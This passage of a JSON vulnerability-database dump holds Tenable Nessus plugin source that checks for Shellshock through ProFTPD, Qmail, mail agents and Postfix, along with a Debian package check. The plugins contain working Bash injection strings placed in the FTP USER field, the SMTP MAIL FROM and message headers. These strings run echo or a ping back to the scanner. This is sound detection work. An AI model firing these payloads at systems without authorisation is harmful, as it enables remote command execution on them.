as an environment variable, which is then evaluated by Bash\nas code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.proftpd.org/docs/contrib/mod_exec.html#ExecEnviron\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:proftpd:proftpd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"FTP\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\", \"ftp_starttls.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/ftp\", 21);\n script_timeout(600);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"ftp_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"kerberos_func.inc\");\ninclude(\"ldap_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"nntp_func.inc\");\ninclude(\"rsync.inc\");\ninclude(\"smtp_func.inc\");\ninclude(\"ssl_funcs.inc\");\ninclude(\"telnet2_func.inc\");\n\nport = get_ftp_port(default:21);\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nfunction ftp_open(port)\n{\n local_var encaps, soc;\n\n encaps = get_port_transport(port);\n if (encaps > ENCAPS_IP)\n {\n if (get_kb_item(\"global_settings/disable_test_ssl_based_services\"))\n exit(1, \"Not testing SSL based services per user config.\");\n soc = open_sock_ssl(port, encaps:encaps);\n }\n else soc = open_sock_tcp(port, transport:ENCAPS_IP);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n # Discard banner\n ftp_debug(str:\"custom banner\");\n ftp_recv_line(socket:soc);\n\n return soc;\n}\n\n# Attempt to get the service to echo something back to us, if the\n# 'ExecOptions sendStdout' option is set.\n\necho_injection = '() { :;}; echo \"NESSUS-e07ad3ba-$((17 + 12))-59f8d00f4bdf\"';\necho_response = 'NESSUS-e07ad3ba-29-59f8d00f4bdf';\n\nsocket = ftp_open(port:port);\n\nsend(socket:socket, data:\"USER \" + echo_injection + '\\r\\n');\nres = recv(socket:socket, length:2000, min:2000, timeout:60);\n\nftp_close(socket:socket);\n\nif (echo_response >< res)\n{\n report = NULL;\n if (report_verbosity > 0)\n {\n report =\n '\\n' + 'Nessus was able to determine that the remote host is vulnerable to the ' +\n '\\n' + 'Shellshock vulnerability by evaluating a simple math equation, injected ' +\n '\\n' + 'through the ProFTPD service on port ' + port + '. 
The service allowed injection ' +\n '\\n' + \"via the '%U' mod_exec 'cookie'.\" +\n '\\n';\n }\n security_hole(port:port, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"FTP server\", port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:37", "description": "The remote host appears to be running Qmail. A remote attacker can exploit Qmail to execute commands via a specially crafted MAIL FROM header if the remote host has a vulnerable version of Bash. This is due to the fact that Qmail does not properly sanitize input before setting environmental variables.\n\nA negative result from this plugin does not prove conclusively that the remote system is not affected by Shellshock, only that Qmail could not be used to exploit the Shellshock flaw.", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Qmail Remote Command Execution via Shellshock", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:qmail:qmail", "cpe:/a:gnu:bash"], "id": "SHELLSHOCK_QMAIL.NASL", "href": "https://www.tenable.com/plugins/nessus/77970", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77970);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Qmail Remote Command Execution 
via Shellshock\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server allows remote command execution via Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running Qmail. A remote attacker can\nexploit Qmail to execute commands via a specially crafted MAIL FROM\nheader if the remote host has a vulnerable version of Bash. This is\ndue to the fact that Qmail does not properly sanitize input before\nsetting environmental variables.\n\nA negative result from this plugin does not prove conclusively that\nthe remote system is not affected by Shellshock, only that Qmail could\nnot be used to exploit the Shellshock flaw.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced Bash patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:qmail:qmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_keys(\"Settings/ThoroughTests\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nif (! thorough_tests ) audit(AUDIT_THOROUGH);\n\nport = get_service(svc: \"smtp\", default: 25, exit_on_fail: 1);\n\n# Don't really care if its not qmail\nisqm = get_kb_item(\"SMTP/\"+port+\"/qmail\");\nif(isnull(isqm) || !isqm) audit(AUDIT_NOT_DETECT,\"Qmail\",port);\n\n# Don't bother if we cant open a proper port\nsoc = smtp_open(port:port, helo:this_host_name());\nif (!soc) audit(AUDIT_SVC_FAIL,\"SMTP\",port);\nclose(soc);\n\nusers = make_list(\n \"admin\",\n \"qmail\",\n \"root\",\n \"alias\",\n \"qmail-postmaster\",\n \"qmail-abuse\",\n \"qmail-root\"\n);\ntraitor = NULL;\n\nforeach user (users)\n{\n # Open a connection. 
Skip to next user if we fail\n soc = smtp_open(port:port, helo:this_host_name());\n if (!soc) continue;\n ptrn = hexstr(rand_str(length:15));\n attk = \"() { :;}; ping -p \"+ptrn+\" -c 3 \"+this_host_name();\n\n send(socket:soc,data:'MAIL FROM: <'+attk+'>\\r\\n');\n s = smtp_recv_line(socket:soc);\n if(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n {\n close(soc);\n continue; # Next user\n }\n # Has to be a valid user on the system, we try defaults\n send(socket:soc,data:'RCPT TO: <'+user+'@'+get_host_name()+'>\\r\\n');\n s = smtp_recv_line(socket:soc);\n if(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n {\n close(soc);\n continue; # Next user\n }\n send(socket:soc,data:'DATA\\r\\n');\n s = smtp_recv_line(socket:soc);\n if(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n {\n close(soc);\n continue; # Next user\n }\n\n # See if we get a response\n filter = string(\"icmp and icmp[0] = 8 and src host \", get_host_ip());\n s = send_capture(socket:soc,data:'Subject:Vuln\\r\\n.\\r\\n',pcap_filter:filter);\n s = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n # No response, meaning we didn't get in\n if(isnull(s) || ptrn >!< s) continue; # Next user\n\n # We got in, that's good enough\n traitor = user;\n break;\n}\n\n# Couldn't get in\nif(isnull(traitor)) audit(AUDIT_LISTEN_NOT_VULN,\"Qmail\",port);\n\ntraitor = traitor+\"@\"+get_host_name();\nif(report_verbosity > 0)\n{\n report = \"Nessus was able to execute a remote command by sending a message to \"+traitor+'\\n';\n security_hole(port:port,extra:report);\n} else security_hole(port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:23:15", "description": "The remote host appears to be running a mail transfer or mail delivery agent such as Courier, Exim, Postfix, or Procmail. 
Many of these agents can be configured to run utility scripts for a diverse number of tasks including filtering, sorting, and delivering mail. These scripts may create the conditions that are exploitable, making the agent vulnerable to remote code execution via Shellshock.\n\nA negative result from this plugin does not prove conclusively that the remote system is not affected by Shellshock, only that the mail agent running on the system is not configured in such a way to allow remote execution via Shellshock.", "cvss3": {}, "published": "2014-10-28T00:00:00", "type": "nessus", "title": "Mail Transfer Agent and Mail Delivery Agent Remote Command Execution via Shellshock", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "SHELLSHOCK_MAIL_AGENTS.NASL", "href": "https://www.tenable.com/plugins/nessus/78701", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78701);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34896\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Mail Transfer Agent and Mail Delivery Agent Remote Command Execution via Shellshock\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a mail agent installed that allows remote command\nexecution via Shellshock.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running a mail transfer or mail delivery\nagent such as Courier, Exim, Postfix, or Procmail. Many of these\nagents can be configured to run utility scripts for a diverse number\nof tasks including filtering, sorting, and delivering mail. These\nscripts may create the conditions that are exploitable, making the\nagent vulnerable to remote code execution via Shellshock.\n\nA negative result from this plugin does not prove conclusively that\nthe remote system is not affected by Shellshock, only that the mail\nagent running on the system is not configured in such a way to allow\nremote execution via Shellshock.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced Bash patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 
script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nport = get_service(svc: \"smtp\", default: 25, exit_on_fail: 1);\n\n# Open a connection.\nsoc = smtp_open(port:port, helo:this_host_name());\nif (!soc) audit(AUDIT_SVC_FAIL,\"SMTP\",port);\n\n# The data headers we want to try this attack on\nheaders = make_list(\n \"To:\",\n \"References:\",\n \"Cc:\",\n \"Bcc:\",\n \"From:\",\n \"Subject:\",\n \"Date:\",\n \"Message-ID:\",\n \"Comments:\",\n \"Keywords:\",\n \"Resent-Date:\",\n \"Resent-From:\",\n \"Resent-Sender:\"\n);\n\n#########################################################################################\n# Build header/data attacks\nptrn = rand_str(length:10);\ndata = \"\";\nid = 0;\nforeach head (headers)\n{\n hkey = hexstr(mkbyte(id));\n data += head+\"() { :;}; /bin/ping -p \"+hkey+hexstr(ptrn)+\" -c 3 \"+this_host_name()+'\\n';\n id += 1;\n}\nptrn = hexstr(ptrn);\n\nsend(socket:soc,data:'MAIL FROM: <>\\r\\n');\ns = smtp_recv_line(socket:soc);\nif (!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", 
string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\n\nsend(socket:soc,data:'RCPT TO: <nobody>\\r\\n');\ns = smtp_recv_line(socket:soc);\nif (!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\n#########################################################################################\n# Send attack data\nsend(socket:soc,data:'DATA\\r\\n');\ns = smtp_recv_line(socket:soc);\nif (!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\n\n# See if we get a response\nfilter = string(\"icmp and icmp[0] = 8 and src host \", get_host_ip());\ns = send_capture(socket:soc,data:data+'\\r\\n.\\r\\n',pcap_filter:filter);\ns = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\nclose(soc);\n\n# No response, meaning we didn't get in\nif (isnull(s) || ptrn >!< s) audit(AUDIT_LISTEN_NOT_VULN,\"Mail Agent\",port);\n\n# Figure out what let us in\nhkey = eregmatch(pattern:\"(\\d\\d)\"+ptrn,string:s);\n\n# Should never happen\nif (empty_or_null(hkey)) exit(1,\"Could not match pattern to response.\");\n\nhkey = int(getbyte(blob:hex2raw(s:hkey[1]),pos:0));\n\n# Should never happen\nif (hkey > max_index(headers)) exit(1, \"Strange header key in response.\");\n\nheader = headers[hkey];\nif (header == \"\")\n header = \"text contents\";\nelse\n header = \"'\"+str_replace(string:header, find:\":\", replace:\"\")+\"' header\";\n\nif (report_verbosity > 0)\n{\n report = 'The '+tolower(header)+' of the message was used to execute a remote command.';\n security_hole(port:port,extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:13:14", "description": "Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was incomplete and could still allow some characters to be injected into another environment (CVE-2014-7169). 
With this update prefix and suffix for environment variable names which contain shell functions are added as hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are fixed which were revealed in Red Hat's internal analysis for these issues and also independently reported by Todd Sabin.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-03-26T00:00:00", "type": "nessus", "title": "Debian DLA-63-1 : bash security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bash", "p-cpe:/a:debian:debian_linux:bash-builtins", "p-cpe:/a:debian:debian_linux:bash-doc", "p-cpe:/a:debian:debian_linux:bash-static", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-63.NASL", "href": "https://www.tenable.com/plugins/nessus/82208", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-63-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82208);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Debian DLA-63-1 : bash security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271\nreleased in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169). With this update prefix and\nsuffix for environment variable names which contain shell functions\nare added as hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.debian.org/debian-lts-announce/2014/09/msg00020.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/squeeze-lts/bash\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash-builtins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"bash\", reference:\"4.1-3+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bash-builtins\", reference:\"4.1-3+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bash-doc\", reference:\"4.1-3+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bash-static\", reference:\"4.1-3+deb6u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:37", "description": "The remote host appears to be running Postfix. 
Postfix itself is not vulnerable to Shellshock; however, any bash script Postfix runs for filtering or other tasks could potentially be affected if the script exports an environmental variable from the content or headers of a message.\n\nA negative result from this plugin does not prove conclusively that the remote system is not affected by Shellshock, only that any scripts Postfix may be running do not create the conditions that are exploitable via the Shellshock flaw.", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Postfix Script Remote Command Execution via Shellshock", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:postfix:postfix", "cpe:/a:gnu:bash"], "id": "SHELLSHOCK_POSTFIX_FILTERS.NASL", "href": "https://www.tenable.com/plugins/nessus/77969", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77969);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34896\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Postfix Script Remote Command Execution via Shellshock\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server uses scripts that allow remote command\nexecution via Shellshock.\");\n script_set_attribute(attribute:\"description\", 
value:\n\"The remote host appears to be running Postfix. Postfix itself is not\nvulnerable to Shellshock; however, any bash script Postfix runs for\nfiltering or other tasks could potentially be affected if the script\nexports an environmental variable from the content or headers of a\nmessage.\n\nA negative result from this plugin does not prove conclusively that\nthe remote system is not affected by Shellshock, only that any scripts\nPostfix may be running do not create the conditions that are\nexploitable via the Shellshock flaw.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced Bash patch or remove the Postfix scripts.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:postfix:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_keys(\"Settings/ThoroughTests\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nif (! 
